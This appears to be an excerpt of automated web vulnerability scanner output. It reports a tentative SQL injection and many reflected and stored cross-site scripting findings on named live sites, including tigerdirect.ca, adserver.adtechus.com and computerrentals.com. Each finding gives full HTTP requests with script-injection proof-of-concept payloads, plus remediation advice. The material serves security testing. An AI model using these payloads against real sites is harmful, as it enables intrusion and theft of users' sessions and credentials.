Confidence: Tentative
Host: https://www.tigerdirect.ca
Path: /secure/orderlogin.asp
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /secure/orderlogin.asp?1'=1 HTTP/1.1 Host: www.tigerdirect.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Request 2
GET /secure/orderlogin.asp?1''=1 HTTP/1.1 Host: www.tigerdirect.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the DB cookie submitted to the URL /cgi-bin/order.asp is copied into an HTML comment at the URL /applications/searchtools/item_upsell.asp. The payload 45303--><img%20src%3da%20onerror%3dalert(1)>ee996b5153 was submitted in the DB cookie. This input was returned as 45303--><img src=a onerror=alert(1)>ee996b5153 in a subsequent request for the URL /applications/searchtools/item_upsell.asp.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Issue background
Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.
The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.
Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).
Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.
Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cc21"><script>alert(1)</script>5b35710a4ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.03cc21"><script>alert(1)</script>5b35710a4ec/5330.1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group] HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854? Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 285
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e15d7"><script>alert(1)</script>053fcfd23f1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5330.1e15d7"><script>alert(1)</script>053fcfd23f1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group] HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854? Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 285
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26556"><script>alert(1)</script>dbb612cc67a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5330.1/195968726556"><script>alert(1)</script>dbb612cc67a/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group] HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854? Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 285
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c638a"><script>alert(1)</script>d0630b63a7e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5330.1/1959687/0c638a"><script>alert(1)</script>d0630b63a7e/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group] HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854? Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 285
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2931"><script>alert(1)</script>55800ca2451 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5330.1/1959687/0/225f2931"><script>alert(1)</script>55800ca2451/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group] HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854? Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 285
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b9b4"><script>alert(1)</script>ed9624c5b60 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5330.1/1959687/0/225/ADTECH6b9b4"><script>alert(1)</script>ed9624c5b60;target=_blank;key=key1+key2+key3+key4;grp=[group] HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854? Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 285
3.7. http://adserver.adtechus.com/adiframe/3.0/5330.1/1959687/0/225/ADTECH [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://adserver.adtechus.com
Path: /adiframe/3.0/5330.1/1959687/0/225/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48be4"><script>alert(1)</script>b94f62885a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5330.1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group]&48be4"><script>alert(1)</script>b94f62885a9=1 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854? Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 288
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f62e7"><script>alert(1)</script>2ee57e1ea08 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5330.1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group]f62e7"><script>alert(1)</script>2ee57e1ea08 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854? Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 285
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload a9a66><script>alert(1)</script>e3dd50b670a was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5330.1/1959687/0/225/ADTECH;target=a9a66><script>alert(1)</script>e3dd50b670a HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854? Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 278
The value of the _TSM_HiddenField_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d513'%3balert(1)//05c09b48c56 was submitted in the _TSM_HiddenField_ parameter. This input was echoed as 9d513';alert(1)//05c09b48c56 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the br request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39ca8'%3balert(1)//8ccd711ec0c was submitted in the br parameter. This input was echoed as 39ca8';alert(1)//8ccd711ec0c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Fri, 30 Sep 2011 12:10:56 GMT Server: Microsoft-IIS/6.0 P3P: CP=NOI DSP COR NID ADMa OPTa OUR NOR X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 96131
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> PCT Trip Details </title><link h ...[SNIP]... <IFRAME SRC="' + document.location.protocol + '//fls.doubleclick.net/activityi;src=1774243;type=trave806;cat=trave548;u3=tgdirect39ca8';alert(1)//8ccd711ec0c;u4=' + scStoreArc + ';u8=' + hbxStoreType + ';u9=Live;ord=1;num=' + a + '?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0> ...[SNIP]...
3.12. http://computerrentals.com/search.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://computerrentals.com
Path: /search.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5b813--><script>alert(1)</script>42354065ffb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>CRE - Computer Rentals & AV Solutions Search Results for Technology ...[SNIP]... <input type="text" name="q" value="xss desktop se/5b813--><script>alert(1)</script>42354065ffbrver" /> ...[SNIP]...
3.13. http://computerrentals.com/search.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://computerrentals.com
Path: /search.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 908aa</script><script>alert(1)</script>fcdc7750642 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>CRE - Computer Rentals & AV Solutions Search Results for Technology ...[SNIP]... ormRoot('cse-search-form'); options.setAutoComplete(true);
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a5c6</script><script>alert(1)</script>8e5b253ccc9 was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>CRE - Computer Rentals & AV Solutions Search Results for Technology ...[SNIP]... Root('cse-search-form'); options.setAutoComplete(true);
The value of the q request parameter is copied into an HTML comment. The payload 3f8c1--><script>alert(1)</script>74fb586f5cd was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>CRE - Computer Rentals & AV Solutions Search Results for Technology ...[SNIP]... <input type="text" name="q" value="xss desktop server3f8c1--><script>alert(1)</script>74fb586f5cd" /> ...[SNIP]...
The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69d54'%3balert(1)//1f2bc4e80a5 was submitted in the u parameter. This input was echoed as 69d54';alert(1)//1f2bc4e80a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 20e21<script>alert(1)</script>7f372d558b5 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?sid=c4efaaaa-166e-4641-8342-a5d43008a6da&url=http%3A%2F%2Fwww.homedepot.ca%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FHome%3FstoreId%3D10051%26catalogId%3D10051%26langId%3D-15&rurl=http%3A%2F%2Fwww.mcafeesecure.com%2Fus%2Fforconsumers%2Fmcafee_certified_sites.jsp&callback=jQuery15107517646802589297_131738416077120e21<script>alert(1)</script>7f372d558b5&pv%5Bpv%5D=1&pc%5Bpc%5D=1&_=1317384160773 HTTP/1.1 Host: e.targetfuel.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://www.homedepot.ca/webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload e76be<script>alert(1)</script>a0d7c65495 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload de589<img%20src%3da%20onerror%3dalert(1)>0d8ae2ced7c was submitted in the REST URL parameter 4. This input was echoed as de589<img src=a onerror=alert(1)>0d8ae2ced7c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8a4e3<img%20src%3da%20onerror%3dalert(1)>2ed1c13b337 was submitted in the REST URL parameter 4. This input was echoed as 8a4e3<img src=a onerror=alert(1)>2ed1c13b337 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 54169<img%20src%3da%20onerror%3dalert(1)>14dae13a434 was submitted in the REST URL parameter 4. This input was echoed as 54169<img src=a onerror=alert(1)>14dae13a434 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a8c84<img%20src%3da%20onerror%3dalert(1)>76ce5578b56 was submitted in the REST URL parameter 4. This input was echoed as a8c84<img src=a onerror=alert(1)>76ce5578b56 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1f184<img%20src%3da%20onerror%3dalert(1)>54ec4aa3fa6 was submitted in the REST URL parameter 4. This input was echoed as 1f184<img src=a onerror=alert(1)>54ec4aa3fa6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 22c96<img%20src%3da%20onerror%3dalert(1)>85ffdcff86d was submitted in the REST URL parameter 4. This input was echoed as 22c96<img src=a onerror=alert(1)>85ffdcff86d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 71350<img%20src%3da%20onerror%3dalert(1)>69a1cd2b9d4 was submitted in the REST URL parameter 4. This input was echoed as 71350<img src=a onerror=alert(1)>69a1cd2b9d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ecc70<img%20src%3da%20onerror%3dalert(1)>580250d2dd7 was submitted in the REST URL parameter 4. This input was echoed as ecc70<img src=a onerror=alert(1)>580250d2dd7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e4349<img%20src%3da%20onerror%3dalert(1)>1d1ac9815d3 was submitted in the REST URL parameter 4. This input was echoed as e4349<img src=a onerror=alert(1)>1d1ac9815d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ac27d<img%20src%3da%20onerror%3dalert(1)>238586c1107 was submitted in the REST URL parameter 4. This input was echoed as ac27d<img src=a onerror=alert(1)>238586c1107 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 52977<img%20src%3da%20onerror%3dalert(1)>af894da79fc was submitted in the REST URL parameter 4. This input was echoed as 52977<img src=a onerror=alert(1)>af894da79fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 755a4<img%20src%3da%20onerror%3dalert(1)>e9fdd65a692 was submitted in the REST URL parameter 4. This input was echoed as 755a4<img src=a onerror=alert(1)>e9fdd65a692 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 83cda<img%20src%3da%20onerror%3dalert(1)>302fb0df51c was submitted in the REST URL parameter 4. This input was echoed as 83cda<img src=a onerror=alert(1)>302fb0df51c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dcef3<img%20src%3da%20onerror%3dalert(1)>acb8607ef78 was submitted in the REST URL parameter 4. This input was echoed as dcef3<img src=a onerror=alert(1)>acb8607ef78 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8fd5d<img%20src%3da%20onerror%3dalert(1)>e5d3540ef89 was submitted in the REST URL parameter 4. This input was echoed as 8fd5d<img src=a onerror=alert(1)>e5d3540ef89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 75176<img%20src%3da%20onerror%3dalert(1)>82dc671c0f8 was submitted in the REST URL parameter 4. This input was echoed as 75176<img src=a onerror=alert(1)>82dc671c0f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2b456<img%20src%3da%20onerror%3dalert(1)>3ef34cddc25 was submitted in the REST URL parameter 4. This input was echoed as 2b456<img src=a onerror=alert(1)>3ef34cddc25 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 26bb8<img%20src%3da%20onerror%3dalert(1)>4f418de10fa was submitted in the REST URL parameter 4. This input was echoed as 26bb8<img src=a onerror=alert(1)>4f418de10fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c5e3e<img%20src%3da%20onerror%3dalert(1)>af792a1d8d2 was submitted in the REST URL parameter 4. This input was echoed as c5e3e<img src=a onerror=alert(1)>af792a1d8d2 in the application's response.
